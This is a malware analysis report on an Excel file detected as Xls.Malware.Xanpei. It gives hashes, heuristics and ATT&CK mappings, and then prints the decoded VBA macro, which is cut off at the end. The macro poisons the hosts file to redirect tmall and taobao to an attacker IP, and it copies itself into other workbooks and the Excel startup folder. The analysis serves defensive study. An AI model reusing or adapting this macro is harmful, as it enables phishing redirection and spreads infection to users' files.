Xls.Malware.Xanpei-9448553-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 f88e91c20f8aac2f…

MALICIOUS

Office (OLE)

Size: 151.0 KB
Created: 2015-03-30 00:54:29
Authoring application: Microsoft Excel
First seen: 2020-09-24
MD5: b7ffd1e497e542ef09c4eb53887eb0b4
SHA-1: b19ab8bb5938468bb8ffe2bccf11ae26a31d24d1
SHA-256: f88e91c20f8aac2faf51ab24c64f3e49126b4c6b03fe1482fd4c66cf08beee8e
Risk Score: 120

Malware Insights

Xls.Malware.Xanpei-9448553-0 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample is identified as malicious by ClamAV and contains a Workbook_Open VBA macro. The macro attempts to modify the system's hosts file so that requests for legitimate websites such as www.tmall.com and www.taobao.com resolve to the IP address 45.78.21.150. Hosts-file poisoning of this kind is a common technique for phishing or for redirecting users to attacker-controlled sites.

Heuristics (3)

  • ClamAV: Xls.Malware.Xanpei-9448553-0 | severity: critical | CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Xanpei-9448553-0
  • VBA macros detected | severity: medium | 1 related finding | OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro | severity: high | OLE_VBA_WBOPEN
    Document contains a Workbook_Open macro (runs automatically when the workbook is opened)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                  | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 5807 bytes
SHA-256: 37e11786887fc985393edeebc808eeaa165665f08ae4830041b54131a6356b85

Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private WithEvents App As Application
Attribute App.VB_VarHelpID = -1
Sub OfficeCheck()
Dim SysParh As String, Sysadd As String, t As String, sysadd1 As String
SysParh = Space(256)
GetSystemDirectory SysParh, 256
SysParh = Trim(SysParh)
SysParh = Left(SysParh, Len(SysParh) - 1)
SysParh = SysParh & "\drivers\etc\hosts"
Sysadd = "45.78.21.150 www.tmall.com"
sysadd1 = "#45.78.21.150 www.tmall.com"
If Dir(SysParh) <> "" Then
Open SysParh For Input As #1
t = Input(LOF(1), #1)
Close #1
If InStr(t, Sysadd) <> 0 Then
Open SysParh For Output As #1
t = Replace(t, sysadd1, Sysadd)
t = Replace(t, "#45.78.21.150 www.taobao.com", "45.78.21.150 www.taobao.com")
Print #1, t
Close #1
End If
If InStr(t, Sysadd) = 0 Then
Open SysParh For Append As #1
Print #1, vbNewLine & Sysadd & vbNewLine & "45.78.21.150 www.taobao.com"
Close #1
End If
End If
End Sub
Sub runtimer()
Application.OnTime Now + TimeValue("00:00:05"), "thisworkbook.p2d"
End Sub
Private Sub p2d()
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
   Dim WBstr$, Wb As Workbook
    With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.FileFormat = 52 Or ActiveWorkbook.FileFormat = 56 Then
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call d2p"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub"
    End If
    End If
End Sub
Private Sub d2p()
Dim pth As String
Dim Exl As Excel.Application
Dim WBstr$, fn$, Wb As Workbook
Dim ws As Worksheet
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
pth = Application.StartupPath & "\accelerate.xls"
If Dir(pth) = "" Then
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number <> 1004 Then
    Workbooks.Add.SaveAs Filename:=pth, FileFormat:=18
Else
    Workbooks.Close
End If
Else
    Exit Sub
End If
    Set Wb = Workbooks.Open(pth)
        With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLi
... (truncated)